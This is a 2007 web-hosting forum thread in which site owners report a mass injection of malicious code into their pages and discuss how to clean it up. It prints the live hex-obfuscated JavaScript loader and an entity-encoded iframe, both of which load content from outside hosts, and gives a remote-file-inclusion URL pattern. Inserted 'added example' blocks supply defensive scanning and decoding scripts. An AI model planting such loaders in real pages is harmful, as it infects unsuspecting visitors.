Lunarpages Web Hosting Forum

Author Topic: Security Issue with Multiple Hosting Accounts (8/28/2007 - 9/14/2007)

kakdela (Intergalactic Cowboy, 68 posts, http://www.adservices.net)
VERY IMPORTANT: PLEASE CHECK YOUR WEBSITES FOR DEFACEMENT BY HACKERS.

I host MANY websites with LP. Yesterday (8/27/2007) and this morning (8/28/2007) I had started receiving customer complaints that when they went to their sites, their anti-virus software alerted them that their sites were Trojan infected and many were blocked from seeing their sites. I would say that at least 20 or 30 of my clients are affected, all spread out on different LP servers (and yes, all sites have DIFFERENT FTP logins and passwords). There's nothing common among the sites - most of the sites are simple HTML pages - not scripts like forums, cms, or anything that would indicate a common pattern.

So, I went to investigate, and sure enough - all files named index.html or index.php, default.html or .php, home.html or .php (and in some cases login.php) have the following inserted in their body tags (or, in the case of a PHP script, inserted at the bottom of the script). Not just the main directory, but all subdirectories that have index files have been affected as well. All files appear to be dated yesterday or today.

Here's what this defacing looks like:

Code:
function v46d362555ac36(v46d362555b403){
  return(parseInt(v46d362555b403,16));
}
function v46d362555cb88(v46d362555d354){
  var v46d362555db26='';
  for(v46d362555e59a=0; v46d362555e59a<v46d362555d354.length; v46d362555e59a+=2){
    v46d362555db26+=(String.fromCharCode(v46d362555ac36(v46d362555d354.substr(v46d362555e59a, 2))));
  }
  return v46d362555db26;
}
document.write(v46d362555cb88('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6231207372633D5C27687474703A2F2F35382E36352E3233352E3135332F7E706F7A69746976652F6963652F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3931313534292B2766375C272077696474683D333833206865696768743D323338207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));

So far, I have noticed the defacing on the following servers where SOME of my sites are hosted.

viola
atlas
stellar
sabik
danzig
savartos
hathor
prospero
naos
helium
mirach
galatea
centaur
angular
valkanos
omicron
aquarius

and counting... (I am discovering more and more as I try to fix my websites today and also change all FTP passwords - WHAT A PAIN!)

« Last Edit: July 13, 2008, 05:38:14 PM by Priest »
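As an added example that is not part of the original thread: a Python scanner that does what the post above describes doing by hand, walking a web root and every subdirectory for index/default/home/login pages that carry the hex-obfuscated loader. The file names and the loader's shape (a parseInt(x,16) helper feeding String.fromCharCode, then document.write of a long hex literal) come from the post; the demo() tree and the trimmed loader it seeds are constructed here, and all function names are mine.

```python
import os
import re
import tempfile

# File names the thread reports as altered, plus the loader's two tell-tale parts:
# a parseInt(x, 16) helper feeding String.fromCharCode, and document.write() of a
# decoder call on a long even-length hex literal (20 or more byte pairs).
LANDING = re.compile(r"^(index|default|home|login)\.(html?|php)$", re.IGNORECASE)
HEX_DECODER = re.compile(r"parseInt\(\s*\w+\s*,\s*16\s*\)")
HEX_WRITE = re.compile(r"document\.write\(\s*\w+\(\s*'((?:[0-9A-Fa-f]{2}){20,})'\s*\)\s*\)")

def classify(content):
    """Return the reasons a page looks injected (an empty list means clean)."""
    reasons = []
    if HEX_DECODER.search(content) and "String.fromCharCode" in content:
        reasons.append("hex-to-char decoder function")
    m = HEX_WRITE.search(content)
    if m:
        reasons.append("document.write of %d-byte hex literal" % (len(m.group(1)) // 2))
    return reasons

def scan_tree(root):
    """Check every landing page under root, subdirectories included."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not LANDING.match(name):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                reasons = classify(fh.read())
            if reasons:
                hits.append((os.path.relpath(path, root).replace(os.sep, "/"), reasons))
    return sorted(hits)

def demo():
    """Scan a constructed sample tree seeded with a trimmed copy of the thread's loader."""
    loader = ("function a(b){return(parseInt(b,16));}function c(d){var e='';"
              "for(i=0;i<d.length;i+=2){e+=String.fromCharCode(a(d.substr(i,2)));}"
              "return e;} document.write(c('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B'));")
    files = {"index.html": "<body>" + loader + "</body>",
             "blog/index.php": "<?php echo 'hi'; ?>" + loader,
             "blog/home.htm": "<body>clean page</body>",
             "about.html": loader}  # not a landing-page name, so never checked
    with tempfile.TemporaryDirectory() as root:
        for rel, text in files.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(text)
        return scan_tree(root)
```

Point scan_tree() at an account's public_html to get the same list for real files; the 20-pair threshold keeps short legitimate hex strings from triggering.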

Mitch (Berserker Poster, 12625 posts, MitchKeeler.com)
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #1 on: August 29, 2007, 10:11:13 AM »
Hello, I apologize for any inconvenience this might have caused you.  This is something we are currently investigating.  System admins are on the case.  If you have not already done so - please put in a help desk ticket to support@lunarpages.com with examples, links, and servers and we will get this taken care of as soon as we can.  Thanks.
New to Web Site Hosting? Check Out the Lunarpages Blog Hosting Guide!


Follow us @lunarpages on Twitter!
Important Threads: Read This Before Posting! | Lunarforums Rules! | Mitch's Link of the Day!
Also, be sure to check out and subscribe to the Lunartics Blog and the Lunarpages Newsletter !

Need Web Hosting Help? Check out the Lunarpages Web Hosting Wiki. It has tons of tips, tutorials and resources!

leighsww (Guest)
Here's another thread regarding the issue --> Click here

A Mod may want to join the threads  :bigwink: * Edited - On second thought, maybe just leave this one, cuz the other thread has too many of my posts cluttering it up  haha
« Last Edit: August 29, 2007, 10:15:55 AM by leighsww »

kakdela (Intergalactic Cowboy, 68 posts, http://www.adservices.net)
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #3 on: August 29, 2007, 10:49:30 AM »
It's pretty scary - the ease with which these hackers were able to deface so many LP websites at once and on so many different servers. It seems that they went in from inside out - not logged in to each individual site via FTP, but broke into whole servers and defaced sites en masse. What also bothers me is that they were allowed to do this over two days - yesterday and today.

LP, what is the status on getting this resolved? What measures can be taken to make sure such blatant mass defacing doesn't happen again? It doesn't appear to be a matter of changing individual FTP passwords (even though I am doing my part by changing them) - rather, it's an LP-wide security issue. I've spent about three hours today going site by site and removing the inserted Trojan code from my customers' web sites, and I still have more to go.
« Last Edit: August 29, 2007, 10:51:14 AM by kakdela »

Mitch (Berserker Poster, 12625 posts, MitchKeeler.com)
Here's another thread regarding the issue --> Click here

A Mod may want to join the threads  :bigwink: * Edited - On second thought, maybe just leave this one, cuz the other thread has too many of my posts cluttering it up  haha

Ok, I'll just go ahead and re-direct everybody to this thread here.  :thumb:  Right now not all details are known, and anything said would be just pure speculation.  As soon as I get word from the system admins investigating the issue I will let you know here.  Thanks!

leighsww (Guest)
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #5 on: August 29, 2007, 11:14:11 AM »
bluejohn's post in the other thread --> Click here

... shows some interesting data. It displays an IP address of 58.65.235.153. That IP is originating out of Hong Kong.

Now whether that's the Hacker's IP address or an IP that they are just having the defacements redirected to, I don't know  :? but maybe the techy geeks can figure out what is going on with that bit of code that bluejohn deciphered.


JeremyD (SleePy..., Jabba the Hutt, 733 posts, SMF Team Member, LcT Tribe)
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #6 on: August 29, 2007, 06:41:43 PM »
I can assure you, as an SMF Team member myself, there are no known security holes in SMF.
I ran a recursive check through all my files and luckily I don't have this in any of my files, with a fancy php script I made today :P
So I can say that this is actually more random than a single problem so far, as I run hundreds of php scripts, though with most being hand coded scripts.

aiko (Spaceship Captain, 122 posts)
One of my sites got hacked - Please help
« Reply #7 on: August 29, 2007, 11:40:08 PM »
Hi everyone,

One of my sites got hacked. The main page index.php shows a script at the footer...

Header invalid injected code is

Code:
iframe src="&#104&#116&#116&#112&#58&#47&#47&#119&#97&#116&#99&#104&#55&#55&#46&#99&#111&#109&#47&#116&#100&#115&#47&#120&#100&#115&#47&#105&#102&#114&#97&#109&#101&#46&#112&#104&#112"
File index.php permission is 644

Looking for clues...
Do you have any idea where to start?
Any advice...

Thanks in advance, aiko
« Last Edit: July 13, 2008, 05:39:15 PM by Priest »

SteveW (Master Jedi, 1392 posts)
Re: One of my sites got hacked - Please help
« Reply #8 on: August 30, 2007, 12:29:03 AM »
There's a step-by-step at http://25yearsofprogramming.com/blog/20070705.htm that will get you started.

When you get your site logs, look for entries that look like index.php?inc=http://badsite.com/includefile.ext

If your logs appear to be empty, try the cpanel > Raw Access Logs icon instead of Raw Log Manager. (It's right next to it.)

aiko, the <iframe> code you posted is encoded as numeric character references or NCR. Converted to ASCII, it's an iframe with its content served from hxxp://watch77.com/tds/xds/iframe.php.
« Last Edit: August 30, 2007, 09:10:55 AM by SteveW »
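Added example, not from the thread or from SteveW: the two encodings seen in this thread (the hex-pair string in the first post and aiko's numeric character references) decoded offline in Python, without document.write or a browser, so the hidden iframe's src can be pulled out as an indicator for blocking and for grepping other sites. Both payload strings are copied from the posts above; the function names are mine.

```python
import re

# Hex argument of the injected decoder, copied from the thread's first post.
HEX_PAYLOAD = ("3C5343524950543E77696E646F772E7374617475733D27446F6E65273B"
               "646F63756D656E742E777269746528273C696672616D65206E616D653D6231207372633D5C27"
               "687474703A2F2F35382E36352E3233352E3135332F7E706F7A69746976652F6963652F696E6465782E7068703F272B"
               "4D6174682E726F756E64284D6174682E72616E646F6D28292A3931313534292B"
               "2766375C272077696474683D333833206865696768743D323338207374796C653D5C27"
               "646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E")
# The NCR-encoded iframe from aiko's post, exactly as posted (no semicolons).
NCR_PAYLOAD = ('iframe src="&#104&#116&#116&#112&#58&#47&#47&#119&#97&#116&#99&#104&#55&#55'
               '&#46&#99&#111&#109&#47&#116&#100&#115&#47&#120&#100&#115&#47&#105&#102'
               '&#114&#97&#109&#101&#46&#112&#104&#112"')

def decode_hex_pairs(blob):
    """The injected decoder, redone offline: each pair of hex digits is one character."""
    if len(blob) % 2 or not re.fullmatch(r"[0-9A-Fa-f]*", blob):
        raise ValueError("not an even-length hex string")
    return bytes.fromhex(blob).decode("latin-1")

# Decimal or hex numeric character references; browsers accept them without ';'.
NCR = re.compile(r"&#(?:[xX]([0-9A-Fa-f]+)|(\d+));?")

def decode_ncr(text):
    """Expand numeric character references into plain text."""
    return NCR.sub(lambda m: chr(int(m.group(1), 16) if m.group(1) else int(m.group(2))), text)

# src of an iframe tag; tolerates the backslash-escaped quotes used inside document.write('...').
IFRAME_SRC = re.compile(r"\biframe\b[^>]*\bsrc=\\?['\"]?([^'\"\\>\s]+)", re.IGNORECASE)

def iframe_sources(markup):
    """List the src targets of iframes in decoded markup; these are the indicators to block."""
    return IFRAME_SRC.findall(markup)

def is_hidden(markup):
    """True when the decoded markup styles the iframe invisible, as the hex payload does."""
    return re.search(r"display\s*:\s*none", markup, re.IGNORECASE) is not None
```

The hex payload decodes to a <SCRIPT> that writes a 383x238 iframe with display: none, which is why visitors saw nothing but their anti-virus did.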

kakdela (Intergalactic Cowboy, 68 posts, http://www.adservices.net)
Question for LP admins re: recent site defacements
« Reply #9 on: August 30, 2007, 07:42:18 AM »
Has there been any progress on finding out how the hackers were able to break into so many LP servers during the last two days? I have had over 15 sites broken into on probably as many servers, but I have yet to get any notice from LP regarding this. I believe that there are thousands of sites at LP that may have had their homepages defaced with a Trojan (or a hidden link to one), but site owners don't even know it (YET!).

What preventative measures have been implemented since this happened?

I think that Lunarpages should seriously consider some sort of alert system that would e-mail webmasters when their website has been compromised.

Thanks.

Mitch (Berserker Poster, 12625 posts, MitchKeeler.com)
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #10 on: August 30, 2007, 07:56:18 AM »
Hello, I have just merged some of the more recent topics created about this so that we can keep the conversation about it in one place.  This way neither our clients on the forums here nor our support staff have to go hunting around to make sure everybody was replied to.  (Trying to make tracking this a little easier for all  :smiling:)

Server admins are currently still investigating the situation at this time.  If we get any other word on the issue we will be sure to let you know as soon as we can.  Thank you for your understanding and patience as they look into things. 

Lupine1647 (Guest)
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #11 on: August 30, 2007, 07:57:38 AM »
Currently the situation is being investigated by our administrators. If your index page is overwritten, we can perform a restore for you from our backups. Just send a note to support.

I think that Lunarpages should seriously consider some sort of alert system that would e-mail webmasters when their website has been compromised.

How would this be done exactly? Every situation that I could come up with results in more false positives than useful results.

farreachfarm (Newbie, 5 posts)
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #12 on: August 30, 2007, 10:41:03 AM »
This is the SECOND TIME this month!

Watch77 -- Spotted this on 8/29 as well -- This seems to also affect .ASPXs as well.  Not only does watch77.com show up, but so does onlinehomebanking.com.

Invision Power Board -- Furthermore... back on 8/18, my index.aspx was replaced to point to Invision Power Board. Worse yet, the hack removed the log file for that day.

I was told that it's because I had scripts.  My home page is currently nothing but a placeholder, no embedded scripts.  I did have media wiki but that's behind a password protected folder.  I've since deleted it, and still got hacked again.

Oh... I was told that restores cost $75.

--Scott

kakdela (Intergalactic Cowboy, 68 posts, http://www.adservices.net)
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #13 on: August 30, 2007, 10:45:23 AM »
First of all, it's not just one page, it's MANY websites and every index.php, default.php, home.php, login.php or .html or .htm has been altered. And the defacement happened not just in the main directories of websites, but also in nearly every subdirectory as well. So, it's many, many websites and pages.

The alert system that I had in mind may not necessarily send a notice to website owner automatically by the system, but would be sent by LP admin. I am assuming that LP knew that there was an issue with websites being defaced, just because of the sheer number of affected accounts. But, no e-mail was sent to anyone informing them of a problem (at least not to me, and I host a lot of sites.)

It would have been nice to have been notified by LP of the system-wide attack, at least manually (not automatically) - and not hear it from site visitors and customers, or look through nearly 40 sites we host with LP and check and fix every single directory and subdirectory on every single site we own. LP routinely runs scripts to weed out outdated scripts - the same thing could have been done in this particular case, where the same Javascript code was inserted en masse.
« Last Edit: August 30, 2007, 11:43:28 AM by kakdela »

JeremyD (SleePy..., Jabba the Hutt, 733 posts, SMF Team Member, LcT Tribe)
Re: Security Issue with Multiple Hosting Accounts (8/28/2007)
« Reply #14 on: August 30, 2007, 12:30:31 PM »
If this is an RFI (Remote File Inclusion),

I really suggest setting up a custom php.ini with these values
Code:
register_globals = Off
allow_url_fopen = Off
display_errors = Off
log_errors = On
expose_php = Off

This will disable register globals, which is the cause of most problems in php, disable fopen for URLs, hide any errors (so when an error occurs the full path on your site isn't revealed) and instead log them. The last one is optional, but this just tells php not to send any header information about the php on the server. Makes it harder for crawlers to know if you are really using php or not.

For ASP users I don't have much info. I don't use ASP.

I am sure lunarpages is now scanning for this on all clients' sites, hopefully. But a simple php script to search all files in your home folder works just as well.
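Added example (my code, not SteveW's or JeremyD's): the log check SteveW describes earlier in the thread, applied to constructed Apache combined-format lines. It flags any request whose query-string parameter decodes to a remote http/ftp URL, the remote file inclusion attempt that JeremyD's allow_url_fopen = Off setting is meant to neutralize. The IP addresses and log lines are constructed; the badsite.com pattern comes from SteveW's post.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample of Apache combined-format access log lines (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [29/Aug/2007:03:12:07 -0700] "GET /index.php?inc=http://badsite.com/includefile.ext HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"
192.0.2.11 - - [29/Aug/2007:03:12:09 -0700] "GET /index.php?page=about HTTP/1.1" 200 4102 "-" "Mozilla/5.0"
192.0.2.12 - - [29/Aug/2007:03:15:44 -0700] "GET /gallery/index.php?dir=ftp%3A%2F%2Fbadsite.com%2Fx.txt%3F HTTP/1.1" 200 77 "-" "Mozilla/4.0"
192.0.2.13 - - [29/Aug/2007:03:16:01 -0700] "GET /login.php?redirect=/account HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Client IP, request line and status from a combined-format entry.
REQUEST = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A parameter value that names a remote file the script might include.
REMOTE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)

def rfi_attempts(log_text):
    """Return (ip, path, param, value, status) for requests whose query carries a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            value = unquote(value)  # parse_qsl decoded once; catch double-encoded values too
            if REMOTE.match(value.strip()):
                hits.append((m.group("ip"), parts.path, key, value, int(m.group("status"))))
    return hits
```

A 200 status on a flagged line means the script ran with that value; compare the timestamps against the modification dates of the altered index files.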